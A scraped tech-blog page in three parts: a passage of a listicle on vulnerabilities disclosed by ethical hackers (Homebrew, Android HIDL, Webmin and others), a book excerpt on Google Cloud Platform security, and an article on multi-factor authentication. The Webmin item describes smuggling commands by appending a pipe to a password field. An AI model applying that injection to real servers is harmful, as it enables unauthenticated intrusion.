On 31st July 2018, Eric Holmes, a security researcher, reported that he could easily gain access to Homebrew's GitHub repo. Homebrew is a popular, free and open-source software package management system, with well-known packages like node and git, that simplifies the installation of software on macOS. In under 30 minutes, Holmes gained access to an exposed GitHub API token that opened commit access to the core Homebrew repo, thus exposing the entire Homebrew supply chain. On July 31, Holmes first reported this vulnerability to Homebrew's developer, Mike McQuaid, who then publicly disclosed the issue on the Homebrew blog on August 5, 2018. Within a few hours of receiving the report, the credentials had been revoked, replaced, and sanitized within Jenkins so they would not be revealed in the future. In a detailed post about the attack on Medium, Holmes mentioned that if he were a malicious actor, he could easily have made a small, unnoticed change to the openssl formula, placing a backdoor on any machine that installed it.

2. Zimperium zLabs security researcher disclosed a critical vulnerability in multiple high-privileged Android services to Google

In mid-2018, Tamir Zahavi-Brunner, a security researcher at Zimperium zLabs, informed Google of a critical vulnerability affecting multiple privileged Android services. The vulnerability was found in a library, hidl_memory, introduced specifically as part of Project Treble; it does not exist in a previous library that does pretty much the same thing. The vulnerability was in a commonly used library affecting many high-privileged services. A hidl_memory structure comprises mHandle (a HIDL object which holds file descriptors), mSize (the size of the memory to be shared), and mName (the type of memory). These structures are transferred through Binder in HIDL, where complex objects (like hidl_handle or hidl_string) have their own custom code for writing and reading the data. Transferring these structures between 64-bit processes causes no issues; however, the size gets truncated to 32 bits in 32-bit processes, so only the lower 32 bits are used.
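A toy Python illustration of that truncation (not the actual Android code, which is C++):

```python
# A 64-bit size larger than UINT32_MAX loses its upper bits when a 32-bit
# process keeps only the lower 32 bits, so far less memory is mapped
# than the sender declared.
UINT32_MAX = 0xFFFFFFFF

requested_size = UINT32_MAX + 0x1000   # 64-bit size: 0x100000fff
truncated_size = requested_size & UINT32_MAX

print(hex(requested_size))   # 0x100000fff
print(hex(truncated_size))   # 0xfff -- the mapped region is far smaller
```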
So if a 32-bit process receives a hidl_memory whose size is bigger than UINT32_MAX (0xFFFFFFFF), the memory region actually mapped will be much smaller. Google designated this vulnerability CVE-2018-9411 and patched it in the July security update (2018-07-01 patch level), with additional patches in the September security update (2018-09-01 patch level). Zahavi-Brunner later published a detailed post explaining the technical details of the vulnerability and the exploit, in October 2018.

3. A security researcher revealed a vulnerability in a WordPress plugin that leaked the Twitter account information of users

Early this year, on January 17, a French security researcher, Baptiste Robert, popularly known by his online handle Elliot Alderson, found a vulnerability in a WordPress plugin called Social Network Tabs. This vulnerability was assigned the ID CVE-2018-20555 by MITRE. The plugin, which allowed websites to help users share content on social media sites, leaked users' Twitter account info, exposing their personal details to compromise. Robert informed Twitter of this vulnerability on December 1, 2018, prompting Twitter to revoke the keys and render the accounts safe again. Twitter also emailed the affected users about the security lapse in the WordPress plugin, but did not comment on the record when reached.

4. A Google vulnerability researcher revealed an unpatched bug in Windows' cryptographic library that could take down an entire Windows fleet

On June 11, 2019, Tavis Ormandy, a vulnerability researcher at Google, revealed a security issue in SymCrypt, the core cryptographic library for Windows. The vulnerability could take down an entire Windows fleet relatively easily, Ormandy said. He reported the vulnerability on March 13 on Google's Project Zero site and got a response from Microsoft saying that it would issue a security bulletin and fix in the June 11 Patch Tuesday run. On June 11, however, he received a message from the Microsoft Security Response Center (MSRC) saying "that the patch won't ship today and wouldn't be ready until the July release due to issues found in testing." Ormandy disclosed the vulnerability a day after the 90-day deadline elapsed, in line with Google's policy of fixing or publicly disclosing bugs its researchers find within 90 days.

5. Oracle's critical vulnerability in its WebLogic servers

On June 17 this year, Oracle published an out-of-band security update with a patch for a critical code-execution vulnerability in its WebLogic server. The vulnerability came to light when it was reported by the security firm KnownSec404. The vulnerability, tracked as CVE-2019-2729, received a Common Vulnerability Scoring System score of 9.8 out of 10. It was a deserialization attack targeting two web applications that WebLogic appears to expose to the internet by default: wls9_async_response and wls-wsat.war.

6. Security flaws in Boeing 787 Crew Information System/Maintenance System (CIS/MS) code can be misused by hackers

At Black Hat 2019, Ruben Santamarta, a Principal Security Consultant at IOActive, said in his presentation that there were vulnerabilities in the Boeing 787 Dreamliner's components which could be misused by hackers. The security flaws were in the code for a component known as the Crew Information Service/Maintenance System. Santamarta identified three networks in the 787: the Open Data Network (ODN), the Isolated Data Network (IDN), and the Common Data Network (CDN).
Boeing, however, strongly disagreed with Santamarta's findings, saying that such an attack is not possible, and rejected his "claim of having discovered a potential path to pull it off." Santamarta further highlighted a white paper released in September 2018 which mentioned that a publicly accessible Boeing server had been identified using a simple Google search, exposing multiple files. On further analysis, the exposed files were found to contain parts of the firmware running on the Crew Information System/Maintenance System (CIS/MS) and Onboard Networking System (ONS) for the Boeing 787 and 737 models respectively. These included documents, binaries, and configuration files. A Linux-based virtual machine used to allow engineers to access part of Boeing's network was also available.

A reader on the blog of Bruce Schneier, a public-interest technologist, argued that Boeing should let Santamarta's team conduct a test, for the betterment of passengers: "I really wish Boeing would just let them test against an actual 787 instead of immediately dismissing it. In the long run, it would work out way better for them, and even the short term PR would probably be a better look."

Boeing said in a statement, "Although we do not provide details about our cybersecurity measures and protections for security reasons, Boeing is confident that its airplanes are safe from cyberattack." Boeing says it also consulted with the Federal Aviation Administration and the Department of Homeland Security about Santamarta's attack. While the DHS didn't respond to a request for comment, an FAA spokesperson wrote in a statement to WIRED that it's "satisfied with the manufac­turer's assessment of the issue."

Santamarta's research, despite Boeing's denials and assurances, should be a reminder that aircraft security is far from a solved area of cybersecurity research. Stefan Savage, a computer science professor at the University of California, San Diego, said, "This is a reminder that planes, like cars, depend on increasingly complex networked computer systems. They don't get to escape the vulnerabilities that come with this."

Some companies still find it difficult to embrace unknown researchers finding flaws in their networks. Companies might be wary of ethical hackers given that these people work as freelancers under no contract, potentially raising issues around confidentiality and whether the company's security flaws will remain a secret. Because hackers do not enjoy a positive reputation, companies often fail to understand that this work is for their own betterment.

7. Vulnerability in contactless Visa cards that can bypass payment limits

On July 29 this year, two security researchers from Positive Technologies, Leigh-Anne Galloway, Cyber Security Resilience Lead, and Tim Yunusov, Head of Banking Security, discovered flaws in Visa contactless cards that can allow hackers to bypass payment limits. The researchers said the attack was tested with "five major UK banks where it successfully bypassed the UK contactless verification limit of £30 on all tested Visa cards, irrespective of the card terminal." They also warned that this contactless Visa card vulnerability may be possible on cards outside the UK as well. When Forbes asked Visa about this vulnerability, the company wasn't alarmed and said it wasn't planning on updating its systems anytime soon. "One key limitation of this type of attack is that it requires a physically stolen card that has not yet been reported to the card issuer.
Likewise, the transaction must pass issuer validations and detection protocols. It is not a scalable fraud approach that we typically see criminals employ in the real world," a Visa spokesperson told Forbes.

8. Mac Zoom client vulnerability allowed ethical hackers to enable users' cameras

On July 9 this year, a security researcher, Jonathan Leitschuh, publicly disclosed a vulnerability in Mac's Zoom client that could allow any malicious website to activate a user's camera and forcibly join them to a Zoom call without their authority. Around 750,000 companies around the world that use the video conferencing app on their Macs to conduct day-to-day business were vulnerable. Leitschuh disclosed the issue on March 26 on Google's Project Zero blog, with a 90-day disclosure policy. He also suggested a quick fix, which Zoom could have implemented by simply changing its server logic. Zoom took 10 days to confirm the vulnerability, and held a meeting about how it would be patched only 18 days before the end of the 90-day public disclosure deadline, i.e., June 11th, 2019. A day before the public disclosure, Zoom had implemented only the quick-fix solution. Apple patched the vulnerable component on the same day Leitschuh disclosed the vulnerability via Twitter (July 9).

9. Vulnerabilities in the PTP protocol of Canon's EOS 80D DSLR camera allow injection of ransomware

At DefCon 27 this year, Eyal Itkin, a vulnerability researcher at Check Point Software Technologies, revealed vulnerabilities in the Canon EOS 80D DSLR. He demonstrated how flaws in the Picture Transfer Protocol (PTP) allowed him to infect the DSLR with ransomware over a rogue WiFi connection. Itkin highlighted six vulnerabilities in the PTP that could easily allow a hacker to infiltrate the DSLR, inject ransomware, and lock the device, forcing users to pay a ransom to free up their camera and picture files. Itkin's team informed Canon about the vulnerabilities on March 31, 2019. On August 6, Canon published a security advisory informing users that "at this point, there have been no confirmed cases of these vulnerabilities being exploited to cause harm" and asking them to take the advised measures to ensure safety.

10. Security researcher at DefCon 27 revealed an old Webmin backdoor that allowed unauthenticated attackers to execute commands with root privileges on servers

At DefCon 27, a Turkish security researcher, Özkan Mustafa Akkuş, presented a zero-day remote code execution vulnerability in Webmin, a web-based system configuration tool for Unix-like systems. This vulnerability, tracked as CVE-2019-15107, was found in a Webmin security feature, the password reset page, which allows an administrator to enforce a password expiration policy for other users' accounts. The flaw allowed a remote, unauthenticated attacker to execute arbitrary commands with root privileges on affected servers by simply adding a pipe command ("|") to the old password field in POST requests. The Webmin team was informed of the vulnerability on August 17th, 2019. In response, the exploit code was removed, and Webmin version 1.930 was created and released to all users. Jamie Cameron, the author of Webmin, talked in a blog post about how and when this backdoor was injected. He revealed that the backdoor was no accident: it was injected deliberately into the code by a malicious actor.
He wrote, "Neither of these were accidental bugs – rather, the Webmin source code had been maliciously modified to add a non-obvious vulnerability."

TL;DR: Companies should welcome ethical hackers for their own good

Ethical hackers are an important addition to our cybersecurity ecosystem. They help organizations examine security systems and find the minor gaps that could lead to the entire organization being compromised. One way companies can seek their help is by arranging bug bounty programs, which allow ethical hackers to report vulnerabilities to companies in exchange for rewards that can consist of money or just recognition. At other times, a white hat hacker may report a vulnerability as part of their own research, which organizations can misunderstand as an attempt to break into their systems, or dismiss out of confidence in their internal security. Organizations should keep their software security up to date by welcoming additional support from these white hat hackers in finding undetected vulnerabilities.

Researchers release a study into Bug Bounty Programs and Responsible Disclosure for ethical hacking in IoT
How has ethical hacking benefited the software industry
5 pen testing rules of engagement: What to consider while performing Penetration testing
Social engineering attacks – things to watch out for while online

Understanding security features in the Google Cloud Platform (GCP)

Vincy Davis
27 Jul 2019
10 min read
Google's long experience and success in protecting itself against cyberattacks play to our advantage as customers of the Google Cloud Platform (GCP). From years of warding off security threats, Google is well aware of the security implications of the cloud model. Thus, they provide a well-secured structure for their operational activities, data centers, customer data, organizational structure, hiring process, and user support. Google uses a global-scale infrastructure to provide security to commercial services, such as Gmail, Google Search, and Google Photos, and enterprise services, such as GCP and G Suite.

This article is an excerpt from the book Google Cloud Platform for Architects, written by Vitthal Srinivasan, Janani Ravi, et al. In this book, you will learn about the Google Cloud Platform (GCP) and how to manage robust, highly available, and dynamic solutions to drive business objectives. This article gives an insight into the security features of the Google Cloud Platform, the tools that GCP provides for users' benefit, as well as some best practices and design choices for security.

Security features at Google and on the GCP

Let's start by discussing what we get directly by virtue of using the GCP. These are security protections that we would not be able to engineer for ourselves. Let's go through some of the many layers of security provided by the GCP.

Datacenter physical security: Only a small fraction of Google employees ever get to visit a GCP data center. Those data centers, the zones that we have been talking so much about, would probably seem straight out of a Bond film to those that did: security lasers, biometric detectors, alarms, cameras, and all of that cloak-and-dagger stuff.

Custom hardware and trusted booting: A specific form of security attack, the privileged access attack, is on the rise. These attacks involve malicious code running from the least likely spots you'd expect: the OS image, hypervisor, or boot loader. There is only one way to really protect against these, which is to design and build every single element in-house. Google has done that, including hardware, a firmware stack, curated OS images, and a hardened hypervisor. Google data centers are populated with thousands of servers connected to a local network. Google selects and validates building components from vendors and designs custom secure server boards and networking devices for server machines. Google places cryptographic signatures on all low-level components, such as the BIOS, bootloader, kernel, and base OS, to validate that the correct software stack is booting up.

Data disposal: The detritus of the persistent disks and other storage devices that we use is also cleaned thoroughly by Google. This data destruction process involves several steps: an authorized individual wipes the disk clean using a logical wipe, then a different authorized individual inspects the wiped disk. The results of the erasure are stored and logged. The erased drive is then released into inventory for reuse. If a disk is damaged and cannot be wiped clean, it is stored securely, not reused, and such devices are periodically destroyed. Each facility where data disposal takes place is audited once a week.

Data encryption: By default, GCP always encrypts all customer data at rest as well as in motion. This encryption is automatic and requires no action on the user's part. Persistent disks, for instance, are already encrypted using AES-256, and the keys themselves are encrypted with master keys.
All this key management and rotation is handled by Google. In addition to this default encryption, a couple of other encryption options exist as well; more on those below.

Secure service deployment: Google's security documentation will often refer to secure service deployment, and it is important to understand that in this context the term service has a specific meaning: a service is the application binary that a developer writes and runs on the infrastructure. Secure service deployment is based on three attributes:

Identity: Each service running on Google infrastructure has an associated service account identity. A service has to submit the cryptographic credentials provided to it to prove its identity when making or receiving remote procedure calls (RPCs) to other services. Clients use these identities to make sure that they are connecting to the intended server, and the server uses them to restrict access to data and methods to specific clients.

Integrity: Google uses a cryptographic authentication and authorization technique at the application layer to provide strong access control at the abstraction level for interservice communication. Google has ingress and egress filtering facilities at various points in its network to avoid IP spoofing. With this approach, Google is able to maximize its network's performance and availability.

Isolation: Google has an effective sandbox technique to isolate services running on the same machine. This includes Linux user separation, language- and kernel-based sandboxes, and hardware virtualization. Google also secures the operation of sensitive services, such as cluster orchestration in GKE, on exclusively dedicated machines.

Secure interservice communication: The term interservice communication refers to GCP's resources and services talking to each other. To enable this, the owners of the services have individual whitelists of services which can access them. Using these, the owner of a service can also allow specific IAM identities to connect with the services they manage. Apart from that, the Google engineers on the backend who are responsible for the smooth, downtime-free running of the services are also given special identities to access the services (to manage them, not to modify user-input data). Google encrypts interservice communication by encapsulating application layer protocols in RPC mechanisms, to isolate the application layer and to remove any kind of dependency on network security.

Using Google Front End: Whenever we want to expose a service using GCP, the TLS certificate management, service registration, and DNS are managed by Google itself. This facility is called the Google Front End (GFE) service. For example, a simple file of Python code can be hosted as an application on App Engine, and that application will have its own IP, DNS name, and so on.

In-built DDoS protections: Distributed denial-of-service attacks are very well studied, and precautions against such attacks are already built into many GCP services, notably networking and load balancing. Load balancers can actually be thought of as hardened bastion hosts that serve as lightning rods to attract attacks, and so are suitably hardened by Google to ensure that they can withstand those attacks. HTTP(S) and SSL proxy load balancers, in particular, can protect your backend instances from several threats, including SYN floods, port exhaustion, and IP fragment floods.
Insider risk and intrusion detection: Google constantly monitors the activities of all devices in its infrastructure for suspicious activity. To secure employees' accounts, Google has replaced phishable OTP second factors with U2F-compatible security keys. Google also monitors the client devices its employees use to operate the infrastructure, and periodically checks the status of OS images and security patches on those devices. Google has a special mechanism for granting access privileges, named application-level access management control, which exposes internal applications only to specific users connecting from correctly managed devices and from expected network and geographic locations. Google has a very strict and secure way of managing administrative access privileges, with rigorous monitoring of employee activities and predefined limits on administrative access.

Google-provided tools and options for security

As we've just seen, the platform already does a lot for us, but we could still end up leaving ourselves vulnerable to attack if we don't go about designing our cloud infrastructure carefully. To begin with, let's understand a few facilities provided by the platform for our benefit.

Data encryption options: We have already discussed Google's default encryption; this encrypts pretty much everything and requires no user action. So, for instance, all persistent disks are encrypted with AES-256 keys that are automatically created, rotated, and themselves encrypted by Google. In addition to default encryption, a couple of other encryption options are available to users.

Customer-managed encryption keys (CMEK) using Cloud KMS: This option involves the user taking control of the keys that are used, while still storing those keys securely on the GCP using the Key Management Service. The user is now responsible for managing the keys, that is, for creating, rotating, and destroying them. The only GCP service that currently supports CMEK is BigQuery; support in Cloud Storage is in beta.

Customer-supplied encryption keys (CSEK): Here, the user specifies which keys are to be used, but those keys never leave the user's premises. To be precise, the keys are sent to Google as part of API service calls, but Google only uses these keys in memory and never persists them on the cloud. CSEK is supported by two important GCP services: Cloud Storage buckets and persistent disks on GCE VMs. There is an important caveat here though: if you lose your key after having encrypted some GCP data with it, you are entirely out of luck. There will be no way for Google to recover that data.

Cloud security scanner: Cloud security scanner is a GCP-provided security scanner for common vulnerabilities. It has long been available for App Engine applications, but is now also available in alpha for Compute Engine VMs. This handy utility will automatically scan for and detect the following four common vulnerabilities: cross-site scripting (XSS), Flash injection, mixed content (HTTP in HTTPS), and the use of outdated/insecure libraries. Like most security scanners, it automatically crawls an application, follows links, and tries out as many different types of user input and event handlers as possible.
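To make the CSEK option above concrete, here is a hedged sketch using the google-cloud-storage Python client (assumed installed and authenticated; the bucket name is hypothetical, and method names may differ slightly across client library versions):

```python
# Upload and read a Cloud Storage object with a customer-supplied
# encryption key (CSEK). Google uses the key in memory only and never
# persists it; as the caveat above warns, a lost key means lost data.
import os
from google.cloud import storage

encryption_key = os.urandom(32)  # 32 random bytes = an AES-256 key; store safely!

client = storage.Client()
bucket = client.bucket("my-example-bucket")  # hypothetical bucket

# The key is passed with the API call, not stored on Google's side.
blob = bucket.blob("secret.txt", encryption_key=encryption_key)
blob.upload_from_string("sensitive payload")

# Reads require the same key; without it, the object cannot be decrypted.
readback = bucket.blob("secret.txt", encryption_key=encryption_key)
print(readback.download_as_bytes())
```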
Some security best practices

Here is a list of design choices that you could exercise to cope with security threats such as DDoS attacks:

Use hardened bastion hosts such as load balancers (particularly HTTP(S) and SSL proxy load balancers).
Make good use of the firewall rules in your VPC network. Ensure that incoming traffic from unknown sources, or on unknown ports or protocols, is not allowed through.
Use managed services such as Dataflow and Cloud Functions wherever possible; these are serverless and so have smaller attack surfaces.
If your application lends itself to App Engine, it has several security benefits over GCE or GKE, and it can also autoscale quickly, damping the impact of a DDoS attack.
If you are using GCE VMs, consider the use of API rate limits to ensure that the number of requests to a given VM does not increase in an uncontrolled fashion.
Use NAT gateways and avoid public IPs wherever possible to ensure network isolation.
Use Google CDN as a way to offload incoming requests for static content. In the event of a storm of incoming user requests, the CDN servers will be at the edge of the network, and traffic into the core infrastructure will be reduced.

Summary

In this article, you learned that the GCP benefits from Google's long experience countering cyber-threats and security attacks targeted at its other services, such as Google Search, YouTube, and Gmail. There are several built-in security features that already protect users of the GCP from threats that might not even be recognized as existing in an on-premise world. In addition to these built-in protections, all GCP users have various tools at their disposal to scan for security threats and to protect their data.

To know more in-depth about the Google Cloud Platform (GCP), head over to the book Google Cloud Platform for Architects.

Ansible 2 for automating networking tasks on Google Cloud Platform [Tutorial]
Build Hadoop clusters using Google Cloud Platform [Tutorial]
Machine learning APIs for Google Cloud Platform
Summary

In this article, you learned that the GCP benefits from Google's long experience countering cyber-threats and security attacks targeted at other Google services, such as Google Search, YouTube, and Gmail. Several built-in security features already protect users of the GCP from threats that might not even be recognized as existing in an on-premise world. In addition to these built-in protections, all GCP users have various tools at their disposal to scan for security threats and to protect their data.

To know more in-depth about the Google Cloud Platform (GCP), head over to the book, Google Cloud Platform for Architects.

Ansible 2 for automating networking tasks on Google Cloud Platform [Tutorial]
Build Hadoop clusters using Google Cloud Platform [Tutorial]
Machine learning APIs for Google Cloud Platform
Multi-Factor Authentication System – Is it a Good Idea for an App?

Mehul Rajput
20 Aug 2018
7 min read
With cyber-attacks on the rise, strong passwords no longer guarantee enough protection to keep your online profiles safe from hackers. In fact, other security measures, such as antivirus software, encryption technology, and firewalls, are also susceptible to being bypassed when targeted explicitly and dedicatedly. A multi-factor authentication (MFA) system adds another layer of app security to ensure enhanced data safety. According to a survey, hackers use weak or stolen user credentials in a staggering 95% of all web application attacks. MFA implementation can prevent unauthorized access to your personal accounts even if someone manages to steal your sign-in details. It has low complexity, and implementing it does not require a significant amount of time or resources.

What is Multi-Factor Authentication?

Multi-factor authentication emerged as a reaction to the vulnerability and susceptibility of existing security systems. It is a method that confirms a user's identity multiple times before granting access. The pieces of evidence used to validate a user's identity include:

Knowledge factor: something you know (for example, a username, password, or security question)
Possession factor: something you have (for example, a registered phone number, a hardware or software token that generates authentication codes, or a smartcard)
Inherence factor: something you are (biometric information such as fingerprint, face, or voice recognition, or retina scans)

When a system utilizes two or more verification mechanisms, it is known as multi-factor authentication (MFA). The ultimate idea behind MFA is that the more steps a user has to take to access sensitive information, the harder it becomes for a hacker to breach security.

One of the most common methods of authentication is a password coupled with a verification code, a unique string of numbers sent via SMS or email. This method is commonly used by Google, Twitter, and other popular services. iPhone X's Face ID and Windows Hello use the latest innovations in biometric scanners for fingerprints, retinas, or faces, built into the devices. Moreover, you can also use a specialized app on your phone called an authenticator. The app is set up once for a service and then generates codes that can be used whenever needed. Popular authenticator apps include Google Authenticator, Duo Mobile, and Twilio Authy. Authenticator apps are more secure than receiving codes via SMS, primarily because text messages can be intercepted and phone numbers can be hijacked. Authenticator apps, on the other hand, do not rely on your service carrier and function even in the absence of cell service. A minimal sketch of the time-based codes these apps generate follows below.
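To make that concrete, here is a minimal sketch of time-based one-time password (TOTP) generation in the style of RFC 6238, using only Python's standard library. Both the app and the server derive the same short-lived code from a shared secret, so nothing travels over SMS; the secret shown is a made-up example.

```python
# Minimal TOTP sketch (RFC 6238 style): the authenticator app and
# the server each derive a short-lived code from a shared secret
# and the current time, so no code is ever transmitted.
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, step: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32)
    counter = int(time.time()) // step             # 30-second time window
    msg = struct.pack(">Q", counter)               # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                     # dynamic truncation (RFC 4226)
    code = (struct.unpack(">I", digest[offset:offset + 4])[0]
            & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

# Made-up shared secret, for illustration only.
print(totp("JBSWY3DPEHPK3PXP"))
```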
Importance of a Multi-Factor Authentication System

Is MFA worth the hassle of additional verification? Yes, it absolutely is. The extra layer of security can save valuable and sensitive personal information from falling into the wrong hands. Password theft is constantly evolving: hackers employ numerous methods, including phishing, pharming, brute force, and keylogging, to break into online accounts. Moreover, anti-virus systems and advanced firewalls are often ineffective without user authentication. According to a Gemalto report, more than 2.5 billion data records were lost, stolen, or exposed worldwide in 2017, an 88% increase from 2016. Furthermore, cyber-attacks rack up huge financial losses for compromised organizations and individuals alike; essentially, anyone connected to the internet is at risk. It is estimated that by 2021, cyber-crime will cause global financial damages of around $6 trillion annually. Despite these alarming statistics, only 38% of global organizations are prepared to combat a cyber-attack.

MFA implementation can mitigate cyber-attacks considerably. Organizations with multi-factor authentication in place can strengthen their access security. This not only helps them safeguard the personal assets of their employees and customers, but also protects the company's integrity and reputation.

Why a Multi-Factor Authentication System in Apps is a Good Idea

Numerous variables are taken into consideration during the app development process. You want the app to have a friendly user interface that provides a seamless experience. An appealing graphical design and innovative features are also top priorities, and apps undergo rigorous testing to make them bug-free before release. However, a security breach can taint the reputation of your app, especially if it holds sensitive information about its users. Here is why MFA is a good idea for your app:

Intensified security

As mentioned earlier, MFA can bolster protection and reduce the risk associated with password-only apps. Additional means of authentication not only challenge users to prove their identity, they can also give the security team broader visibility into possible identity theft. Moreover, it is not necessary to prompt the user for MFA every time they log into the app. You can use data analytics to trigger MFA for a risk-based approach, taking into account the user's geographical location, IP address, device in use, and so on, before challenging the user's identity with additional authentication. High-risk scenarios that justify MFA include logging in from an unknown device or new location, accessing the app from a new IP address, or attempting to access a highly sensitive resource for the first time. Opt for a risk-based approach only if your app holds information so valuable and intimate that its disclosure would cause irrevocable personal damage to the user; otherwise, such an approach requires complex data analytics, machine learning, and contextual recognition that can be difficult and time-consuming to program. A small risk-scoring sketch follows below.
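As an illustration of that risk-based trigger, here is a minimal sketch that scores a login context and steps up to MFA only when the context looks unusual. The signals, weights, and threshold are hypothetical, not drawn from any particular product.

```python
# Illustrative risk-scoring sketch for the risk-based approach
# described above: prompt for MFA only when the login context
# looks unusual. All signals and thresholds are hypothetical.
from dataclasses import dataclass

@dataclass
class LoginContext:
    known_device: bool
    known_ip: bool
    usual_country: bool
    sensitive_resource: bool

def requires_mfa(ctx: LoginContext, threshold: int = 2) -> bool:
    score = 0
    if not ctx.known_device:
        score += 2        # a new device is a strong risk signal
    if not ctx.known_ip:
        score += 1
    if not ctx.usual_country:
        score += 2        # unexpected geography
    if ctx.sensitive_resource:
        score += 1        # first access to a sensitive resource
    return score >= threshold

print(requires_mfa(LoginContext(True, True, True, False)))    # False: low risk
print(requires_mfa(LoginContext(False, False, True, False)))  # True: step up
```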
Simplified login process

You may consider MFA implementation complicated and cumbersome. However, if you run multiple apps, you can offer more advanced login solutions such as single sign-on. Once the user's identity is validated, they can access every app covered by the single sign-on. This makes the MFA process practical, as users are saved from the fatigue and stress of repeated logins.

Increased customer satisfaction

A customer's satisfaction and trust are among the biggest driving factors for any organization. When you offer MFA to your users, it builds a sense of trustworthiness, and they are more at ease when sharing personal details.

Compliance with standards

In addition to the benefits to users, certain compliance standards, mandated by state, federal, or other authorities, specify that companies must implement MFA in specific situations. Moreover, there are guidelines from the National Institute of Standards and Technology (NIST) that help you choose the right verification methods. It is therefore imperative not only to comply with the regulations but also to implement the recommended MFA methods.

The key is to deploy an MFA system that is not too laborious but offers an optimal number of authentication steps. Given the sheer number of methods available for MFA, choose the most appropriate options based on:

The sensitivity of the data and assets being protected
Convenience and ease of use for customers
Compliance with the specific regulations
Ease of implementation and management for the IT department

Summary

MFA can strengthen the security of sensitive data and protect a user's identity. It adds another layer of shield to safeguard a client's online accounts, obstructing even dedicated hacking efforts. Moreover, it allows you to comply with the standard guidelines proposed by the relevant authorities. However, prompting for MFA individually across different user environments and cloud services can be inconvenient for users. Deploy single sign-on or adopt a risk-based approach to eliminate security vulnerabilities while facilitating user access.

Author Bio

Mehul Rajput is the CEO and co-founder of Mindinventory, which specializes in Android and iOS app development and provides web and mobile app solutions for businesses from startup to enterprise level. He is an avid blogger and writes on mobile technologies, mobile apps, app marketing, app development, startups, and business.

5 application development tools that will matter in 2018
Implement an API Design-first approach for building APIs [Tutorial]
Access application data with Entity Framework in .NET Core [Tutorial]